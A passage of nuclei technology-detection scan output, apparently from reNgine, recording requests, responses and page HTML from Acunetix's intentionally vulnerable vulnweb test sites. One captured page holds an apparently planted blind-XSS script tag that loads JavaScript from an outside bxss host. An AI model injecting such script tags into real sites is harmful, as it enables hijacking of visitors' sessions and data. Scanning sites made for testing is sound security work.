style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:41.32813678Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"ms-iis\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:32 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=yqqlv5rvfxxko131fkruqp55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(28) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(28) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(29) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" 